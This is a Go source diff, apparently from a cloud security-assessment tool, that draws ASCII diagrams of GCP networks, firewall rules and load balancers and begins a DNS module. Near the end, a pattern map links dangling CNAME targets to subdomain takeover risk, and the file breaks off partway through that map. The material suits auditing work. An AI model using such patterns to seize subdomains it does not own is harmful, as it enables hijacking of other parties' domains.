regionDisplay[:subnetWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, regionDisplay)) + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Separator + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┤") + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Subnet details for each region + maxSubnets := 0 + for _, region := range rowRegions { + if len(subnetsByRegion[region]) > maxSubnets { + maxSubnets = len(subnetsByRegion[region]) + } + } + + for subnetIdx := 0; subnetIdx < maxSubnets; subnetIdx++ { + // Subnet name + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + name := s.Name + if len(name) > subnetWidth-4 { + name = name[:subnetWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, name)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // CIDR + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, s.IPCIDRRange)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Flags (PGA, Logs) + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + pga := "PGA:N" + if s.PrivateIPGoogleAccess { + pga = "PGA:Y" + } + logs := "Logs:N" + if s.FlowLogsEnabled { + logs = "Logs:Y" + } + flags := fmt.Sprintf("[%s][%s]", pga, logs) + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, flags)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + } + + // Bottom of subnet boxes + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┘") + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + } + } + + // Check for Cloud NAT + nats := natsByNetwork[key] + if len(nats) > 0 { + sb.WriteString("│ │ │ │\n") + sb.WriteString("│ │ ┌────────────────────────┐ │ │\n") + for _, nat := range nats { + natIPs := "AUTO" + if len(nat.NATIPAddresses) > 0 { + natIPs = strings.Join(nat.NATIPAddresses, ",") + if len(natIPs) > 18 { + natIPs = natIPs[:15] + "..." + } + } + natName := nat.Name + if len(natName) > 11 { + natName = natName[:11] + } + natRegion := nat.Region + if len(natRegion) > 13 { + natRegion = natRegion[:13] + } + sb.WriteString(fmt.Sprintf("│ │ │ Cloud NAT: %-11s │ │ │\n", natName)) + sb.WriteString(fmt.Sprintf("│ │ │ Region: %-13s │ │ │\n", natRegion)) + sb.WriteString(fmt.Sprintf("│ │ │ IPs: %-16s │ │ │\n", natIPs)) + } + sb.WriteString("│ │ └───────────┬────────────┘ │ │\n") + sb.WriteString("│ │ │ │ │\n") + sb.WriteString("│ │ ▼ │ │\n") + sb.WriteString("│ │ [INTERNET] │ │\n") + } + + // VPC footer + sb.WriteString("│ │ │ │\n") + sb.WriteString("│ └") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┘ │\n") + + return sb.String() +} + +func drawSharedVPCRelationships(sharedVPCs map[string]SharedVPCConfig, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "SHARED VPC RELATIONSHIPS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for hostProject, config := range sharedVPCs { + sb.WriteString(DrawEmptyLine(width)) + sb.WriteString("│ ┌─────────────────────────────┐ │\n") + sb.WriteString("│ │ HOST PROJECT │ │\n") + + hostDisplay := hostProject + if len(hostDisplay) > 27 { + hostDisplay = hostDisplay[:24] + "..." + } + sb.WriteString(fmt.Sprintf("│ │ %-27s │ │\n", hostDisplay)) + sb.WriteString("│ └──────────────┬──────────────┘ │\n") + sb.WriteString("│ │ │\n") + + if len(config.ServiceProjects) > 0 { + numProjects := len(config.ServiceProjects) + if numProjects > 6 { + numProjects = 6 + } + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + if i == 0 { + sb.WriteString("┌") + } else { + sb.WriteString("┬") + } + sb.WriteString("────────────") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString("┬────────────") + } + sb.WriteString(strings.Repeat(" ", max(0, width-6-(numProjects*13)-14))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + sb.WriteString("▼ ") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-6-(numProjects*13)-14))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ { + sb.WriteString("┌──────────┐ ") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ... ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ { + proj := config.ServiceProjects[i] + if len(proj) > 10 { + proj = proj[:7] + "..." + } + sb.WriteString(fmt.Sprintf("│%-10s│ ", proj)) + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(fmt.Sprintf("(+%d more) ", len(config.ServiceProjects)-6)) + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + sb.WriteString("└──────────┘ ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12+12))) + sb.WriteString("│\n") + } + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +func collectAllPeerings(peeringMap map[string][]VPCPeeringInfo) []VPCPeeringInfo { + var all []VPCPeeringInfo + for _, peerings := range peeringMap { + all = append(all, peerings...) + } + return all +} + +func drawPeeringSummary(peerings []VPCPeeringInfo, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "VPC PEERING CONNECTIONS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for _, peering := range peerings { + // Draw peering connection + networkName := extractNetworkNameFromURL(peering.Network) + peerNetworkName := extractNetworkNameFromURL(peering.PeerNetwork) + + state := peering.State + if state == "" { + state = "ACTIVE" + } + + routeInfo := "" + if peering.ExportRoutes && peering.ImportRoutes { + routeInfo = "[export+import routes]" + } else if peering.ExportRoutes { + routeInfo = "[export routes]" + } else if peering.ImportRoutes { + routeInfo = "[import routes]" + } + + line := fmt.Sprintf(" %s <──────> %s (%s) %s", networkName, peerNetworkName, state, routeInfo) + if len(line) > width-4 { + line = line[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line)) + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawNetworkLegend draws a legend for network topology diagrams +func DrawNetworkLegend(width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "PGA:Y/N = Private Google Access enabled/disabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Logs:Y/N = VPC Flow Logs enabled/disabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[SHARED VPC HOST] = Project hosts shared VPC networks")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[SHARED VPC SERVICE] = Project uses shared VPC networks")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[n PEERING(s)] = Number of VPC peering connections")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "<──────> = VPC peering connection")) + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// ======================================== +// Firewall Diagram Functions +// ======================================== + +// DrawFirewallDiagram generates an ASCII diagram showing firewall rules +func DrawFirewallDiagram( + rules []FirewallRuleInfo, + networkName string, + projectID string, + width int, +) string { + var sb strings.Builder + + title := fmt.Sprintf("FIREWALL RULES: %s", networkName) + if projectID != "" { + title = fmt.Sprintf("FIREWALL RULES: %s (Project: %s)", networkName, projectID) + } + + sb.WriteString(DrawBox(title, width)) + sb.WriteString("\n") + + // Separate ingress and egress + var ingressRules, egressRules []FirewallRuleInfo + for _, rule := range rules { + if strings.ToUpper(rule.Direction) == "INGRESS" { + ingressRules = append(ingressRules, rule) + } else { + egressRules = append(egressRules, rule) + } + } + + // Draw ingress section + if len(ingressRules) > 0 { + sb.WriteString(drawFirewallSection("INGRESS (Inbound Traffic)", ingressRules, width)) + sb.WriteString("\n") + } + + // Draw egress section + if len(egressRules) > 0 { + sb.WriteString(drawFirewallSection("EGRESS (Outbound Traffic)", egressRules, width)) + sb.WriteString("\n") + } + + // Draw traffic flow visualization + sb.WriteString(drawTrafficFlowDiagram(ingressRules, egressRules, width)) + + // Legend + sb.WriteString(DrawFirewallLegend(width)) + + return sb.String() +} + +func drawFirewallSection(title string, rules []FirewallRuleInfo, width int) string { + var sb strings.Builder + + // Sort by priority + sort.Slice(rules, func(i, j int) bool { + return rules[i].Priority < rules[j].Priority + }) + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for _, rule := range rules { + // Risk indicator + riskIndicator := " " + if rule.IsPublicIngress { + riskIndicator = "⚠ " + } + + // Disabled indicator + disabledLabel := "" + if rule.Disabled { + disabledLabel = " [DISABLED]" + } + + // Format source ranges + sources := strings.Join(rule.SourceRanges, ", ") + if len(sources) > 30 { + sources = sources[:27] + "..." + } + if sources == "" { + sources = "*" + } + + // Format targets + targets := rule.TargetTags + if targets == "" { + targets = "ALL" + } + + // Rule name line + nameLine := fmt.Sprintf("%s%s (Priority: %d)%s", riskIndicator, rule.Name, rule.Priority, disabledLabel) + if len(nameLine) > width-4 { + nameLine = nameLine[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, nameLine)) + + // Details line + detailLine := fmt.Sprintf(" Sources: %s → Ports: %s → Targets: %s", sources, rule.AllowedPorts, targets) + if len(detailLine) > width-4 { + detailLine = detailLine[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, detailLine)) + sb.WriteString(DrawEmptyLine(width)) + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +func drawTrafficFlowDiagram(ingressRules, egressRules []FirewallRuleInfo, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "TRAFFIC FLOW VISUALIZATION")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Count public ingress + publicIngress := 0 + for _, r := range ingressRules { + if r.IsPublicIngress { + publicIngress++ + } + } + + // Draw simplified flow + sb.WriteString("│ │\n") + sb.WriteString("│ ┌─────────────┐ ┌─────────────────────┐ ┌─────────────┐ │\n") + sb.WriteString("│ │ INTERNET │ ─────> │ FIREWALL RULES │ ─────> │ VPC/VMs │ │\n") + sb.WriteString("│ │ (External) │ │ │ │ (Internal) │ │\n") + sb.WriteString("│ └─────────────┘ └─────────────────────┘ └─────────────┘ │\n") + sb.WriteString("│ │\n") + + // Summary stats + statsLine := fmt.Sprintf(" Ingress Rules: %d (Public: %d) Egress Rules: %d", len(ingressRules), publicIngress, len(egressRules)) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, statsLine)) + + if publicIngress > 0 { + warningLine := " ⚠ WARNING: Public ingress rules allow traffic from 0.0.0.0/0" + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, warningLine)) + } + + sb.WriteString("│ │\n") + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawFirewallLegend draws the firewall diagram legend +func DrawFirewallLegend(width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "⚠ = Public ingress rule (0.0.0.0/0 source)")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Priority = Lower number = higher priority (evaluated first)")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[DISABLED] = Rule is not active")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Targets: ALL = Rule applies to all instances in network")) + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// ======================================== +// Load Balancer Diagram Functions +// ======================================== + +// DrawLoadBalancerDiagram generates an ASCII diagram showing load balancer traffic flow +func DrawLoadBalancerDiagram( + loadBalancers []LoadBalancerInfo, + projectID string, + width int, +) string { + var sb strings.Builder + + title := "LOAD BALANCER TRAFFIC FLOW" + if projectID != "" { + title = fmt.Sprintf("LOAD BALANCER TRAFFIC FLOW (Project: %s)", projectID) + } + + sb.WriteString(DrawBox(title, width)) + sb.WriteString("\n") + + // Separate external and internal + var externalLBs, internalLBs []LoadBalancerInfo + for _, lb := range loadBalancers { + if strings.ToUpper(lb.Scheme) == "EXTERNAL" { + externalLBs = append(externalLBs, lb) + } else { + internalLBs = append(internalLBs, lb) + } + } + + // Draw external load balancers with flow + if len(externalLBs) > 0 { + sb.WriteString(drawLBFlowSection("EXTERNAL (Internet-facing)", externalLBs, width)) + sb.WriteString("\n") + } + + // Draw internal load balancers with flow + if len(internalLBs) > 0 { + sb.WriteString(drawLBFlowSection("INTERNAL (VPC-only)", internalLBs, width)) + sb.WriteString("\n") + } + + // Summary stats + sb.WriteString(drawLBSummary(externalLBs, internalLBs, width)) + + // Legend + sb.WriteString(DrawLoadBalancerLegend(width)) + + return sb.String() +} + +// drawLBFlowSection draws individual load balancer flows showing frontend -> backend +func drawLBFlowSection(title string, lbs []LoadBalancerInfo, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for i, lb := range lbs { + // Draw flow for each load balancer + sb.WriteString(drawSingleLBFlow(lb, width)) + + // Add separator between LBs (but not after the last one) + if i < len(lbs)-1 { + sb.WriteString("│") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("│\n") + } + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawSingleLBFlow draws a single load balancer's traffic flow +func drawSingleLBFlow(lb LoadBalancerInfo, width int) string { + var sb strings.Builder + + // Security indicator + armorLabel := "" + if lb.SecurityPolicy != "" { + armorLabel = " [Cloud Armor: " + lb.SecurityPolicy + "]" + } + + // LB name and type header + headerLine := fmt.Sprintf(" %s (%s, %s)%s", lb.Name, lb.Type, lb.Region, armorLabel) + if len(headerLine) > width-4 { + headerLine = headerLine[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, headerLine)) + sb.WriteString(DrawEmptyLine(width)) + + // Frontend (IP:Port) + frontendBox := fmt.Sprintf("%s:%s", lb.IPAddress, lb.Port) + + // Build backend lines with actual backend targets + var backendLines []string + if len(lb.BackendServices) == 0 { + backendLines = []string{"(no backends)"} + } else { + for _, beSvc := range lb.BackendServices { + // Check if we have detailed backend info + if lb.BackendDetails != nil { + if targets, ok := lb.BackendDetails[beSvc]; ok && len(targets) > 0 { + // Show backend service with its targets + backendLines = append(backendLines, fmt.Sprintf("%s:", beSvc)) + for _, target := range targets { + backendLines = append(backendLines, fmt.Sprintf(" -> %s", target)) + } + } else { + backendLines = append(backendLines, beSvc) + } + } else { + backendLines = append(backendLines, beSvc) + } + } + } + + // Calculate dynamic backend width based on longest line + backendWidth := 35 + for _, line := range backendLines { + if len(line)+4 > backendWidth { + backendWidth = len(line) + 4 + } + } + // Cap at reasonable max + maxBackendWidth := width - 35 + if backendWidth > maxBackendWidth { + backendWidth = maxBackendWidth + } + + frontendWidth := 23 + arrowWidth := 7 + padding := width - frontendWidth - backendWidth - arrowWidth - 8 + if padding < 0 { + padding = 0 + } + + // Top of boxes + sb.WriteString(fmt.Sprintf("│ ┌%s┐ ┌%s┐%s│\n", + strings.Repeat("─", frontendWidth), + strings.Repeat("─", backendWidth), + strings.Repeat(" ", padding))) + + // Frontend label + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │ %-*s │%s│\n", + frontendWidth-2, "FRONTEND", + backendWidth-2, "BACKEND SERVICE -> TARGETS", + strings.Repeat(" ", padding))) + + // Separator with arrow + sb.WriteString(fmt.Sprintf("│ ├%s┤ ───> ├%s┤%s│\n", + strings.Repeat("─", frontendWidth), + strings.Repeat("─", backendWidth), + strings.Repeat(" ", padding))) + + // IP:Port line with first backend + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │ %-*s │%s│\n", + frontendWidth-2, frontendBox, + backendWidth-2, safeGetIndex(backendLines, 0), + strings.Repeat(" ", padding))) + + // Additional backend lines + for i := 1; i < len(backendLines); i++ { + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │ %-*s │%s│\n", + frontendWidth-2, "", + backendWidth-2, backendLines[i], + strings.Repeat(" ", padding))) + } + + // Bottom of boxes + sb.WriteString(fmt.Sprintf("│ └%s┘ └%s┘%s│\n", + strings.Repeat("─", frontendWidth), + strings.Repeat("─", backendWidth), + strings.Repeat(" ", padding))) + + sb.WriteString(DrawEmptyLine(width)) + + return sb.String() +} + +// drawLBSummary draws summary statistics +func drawLBSummary(externalLBs, internalLBs []LoadBalancerInfo, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "SUMMARY")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Count with Cloud Armor + armorCount := 0 + for _, lb := range externalLBs { + if lb.SecurityPolicy != "" { + armorCount++ + } + } + + statsLine := fmt.Sprintf(" External LBs: %d Internal LBs: %d With Cloud Armor: %d/%d", + len(externalLBs), len(internalLBs), armorCount, len(externalLBs)) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, statsLine)) + + if len(externalLBs) > 0 && armorCount == 0 { + warningLine := " ⚠ WARNING: No external load balancers have Cloud Armor protection" + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, warningLine)) + } else if len(externalLBs) > armorCount { + warningLine := fmt.Sprintf(" ⚠ WARNING: %d external load balancer(s) missing Cloud Armor", len(externalLBs)-armorCount) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, warningLine)) + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// truncateString truncates a string to maxLen, adding "..." if needed +func truncateString(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + if maxLen <= 3 { + return s[:maxLen] + } + return s[:maxLen-3] + "..." +} + +// safeGetIndex safely gets an index from a slice, returning empty string if out of bounds +func safeGetIndex(slice []string, index int) string { + if index < len(slice) { + return slice[index] + } + return "" +} + +// DrawLoadBalancerLegend draws the load balancer diagram legend +func DrawLoadBalancerLegend(width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "[Cloud Armor] = WAF/DDoS protection enabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "EXTERNAL = Internet-facing load balancer")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "INTERNAL = Private/VPC-only load balancer")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "global = Global anycast load balancer")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "regional = Region-specific load balancer")) + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// ======================================== +// VPC Networks Diagram Functions +// ======================================== + +// DrawVPCNetworksDiagram generates a compact VPC networks overview diagram +func DrawVPCNetworksDiagram( + networks []NetworkInfo, + subnetsByNetwork map[string][]SubnetInfo, + peerings []VPCPeeringInfo, + projectID string, + width int, +) string { + var sb strings.Builder + + title := "VPC NETWORKS OVERVIEW" + if projectID != "" { + title = fmt.Sprintf("VPC NETWORKS OVERVIEW (Project: %s)", projectID) + } + + sb.WriteString(DrawBox(title, width)) + sb.WriteString("\n") + + // Draw each network + for _, network := range networks { + sb.WriteString(drawVPCNetworkCompact(network, subnetsByNetwork, width)) + sb.WriteString("\n") + } + + // Peering summary + if len(peerings) > 0 { + sb.WriteString(drawVPCPeeringsCompact(peerings, width)) + sb.WriteString("\n") + } + + // Legend + sb.WriteString(DrawVPCNetworkLegend(width)) + + return sb.String() +} + +func drawVPCNetworkCompact(network NetworkInfo, subnetsByNetwork map[string][]SubnetInfo, width int) string { + var sb strings.Builder + + // Network header + sharedLabel := "" + if network.IsSharedVPC { + sharedLabel = fmt.Sprintf(" [SHARED VPC %s]", strings.ToUpper(network.SharedVPCRole)) + } + peeringLabel := "" + if network.PeeringCount > 0 { + peeringLabel = fmt.Sprintf(" [%d peerings]", network.PeeringCount) + } + + title := fmt.Sprintf("VPC: %s (%s routing)%s%s", network.Name, network.RoutingMode, sharedLabel, peeringLabel) + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + if len(title) > width-4 { + title = title[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Get subnets + key := network.ProjectID + "/" + network.Name + subnets := subnetsByNetwork[key] + + if len(subnets) == 0 { + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, " (No subnets)")) + } else { + // Group by region + byRegion := make(map[string][]SubnetInfo) + for _, s := range subnets { + byRegion[s.Region] = append(byRegion[s.Region], s) + } + + var regions []string + for r := range byRegion { + regions = append(regions, r) + } + sort.Strings(regions) + + for _, region := range regions { + regionSubnets := byRegion[region] + regionLine := fmt.Sprintf(" 📍 %s:", region) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, regionLine)) + + for _, s := range regionSubnets { + pga := "-" + if s.PrivateIPGoogleAccess { + pga = "PGA" + } + logs := "-" + if s.FlowLogsEnabled { + logs = "Logs" + } + subnetLine := fmt.Sprintf(" %s (%s) [%s][%s]", s.Name, s.IPCIDRRange, pga, logs) + if len(subnetLine) > width-4 { + subnetLine = subnetLine[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, subnetLine)) + } + } + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +func drawVPCPeeringsCompact(peerings []VPCPeeringInfo, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "VPC PEERINGS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for _, p := range peerings { + networkName := extractNetworkNameFromURL(p.Network) + peerNetworkName := extractNetworkNameFromURL(p.PeerNetwork) + routes := "" + if p.ExportRoutes && p.ImportRoutes { + routes = " [↔ routes]" + } else if p.ExportRoutes { + routes = " [→ export]" + } else if p.ImportRoutes { + routes = " [← import]" + } + line := fmt.Sprintf(" %s ←→ %s (%s)%s", networkName, peerNetworkName, p.State, routes) + if len(line) > width-4 { + line = line[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line)) + } + + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawVPCNetworkLegend draws the VPC network diagram legend +func DrawVPCNetworkLegend(width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "PGA = Private Google Access enabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "Logs = VPC Flow Logs enabled")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "←→ = VPC Peering connection")) + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "📍 = Region location")) + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// ======================================== +// Helper Functions +// ======================================== + +// extractNetworkNameFromURL extracts network name from full URL +func extractNetworkNameFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +// max returns the maximum of two integers +func max(a, b int) int { + if a > b { + return a + } + return b +} diff --git a/gcp/services/dnsService/dnsService.go b/gcp/services/dnsService/dnsService.go new file mode 100644 index 00000000..c91397cd --- /dev/null +++ b/gcp/services/dnsService/dnsService.go @@ -0,0 +1,363 @@ +package dnsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + dns "google.golang.org/api/dns/v1" +) + +type DNSService struct{ + session *gcpinternal.SafeSession +} + +func New() *DNSService { + return &DNSService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DNSService { + return &DNSService{ + session: session, + } +} + +// ZoneInfo holds Cloud DNS managed zone details +type ZoneInfo struct { + Name string + ProjectID string + DNSName string // The DNS name (e.g., example.com.) + Description string + Visibility string // public or private + CreationTime string + + // DNSSEC configuration + DNSSECState string // on, off, transfer + DNSSECKeyType string + + // Private zone configuration + PrivateNetworks []string // VPC networks for private zones + + // Peering configuration + PeeringNetwork string + PeeringTargetProject string + + // Forwarding configuration + ForwardingTargets []string + + // Record count + RecordCount int64 + + // IAM bindings + IAMBindings []IAMBinding +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// RecordInfo holds DNS record details +type RecordInfo struct { + Name string + ProjectID string + ZoneName string + Type string // A, AAAA, CNAME, MX, TXT, etc. + TTL int64 + RRDatas []string // Record data +} + +// TakeoverRisk represents a potential subdomain takeover vulnerability +type TakeoverRisk struct { + RecordName string + RecordType string + Target string + Service string // AWS S3, Azure, GitHub Pages, etc. + RiskLevel string // HIGH, MEDIUM, LOW + Description string + Verification string // How to verify the takeover +} + +// takeoverPatterns maps CNAME/A record patterns to potential takeover services +var takeoverPatterns = map[string]struct { + Service string + RiskLevel string + Description string +}{ + // AWS + ".s3.amazonaws.com": {"AWS S3", "HIGH", "S3 bucket may be unclaimed - check for 'NoSuchBucket' error"}, + ".s3-website": {"AWS S3 Website", "HIGH", "S3 website bucket may be unclaimed"}, + ".elasticbeanstalk.com": {"AWS Elastic Beanstalk", "HIGH", "Elastic Beanstalk environment may be deleted"}, + ".cloudfront.net": {"AWS CloudFront", 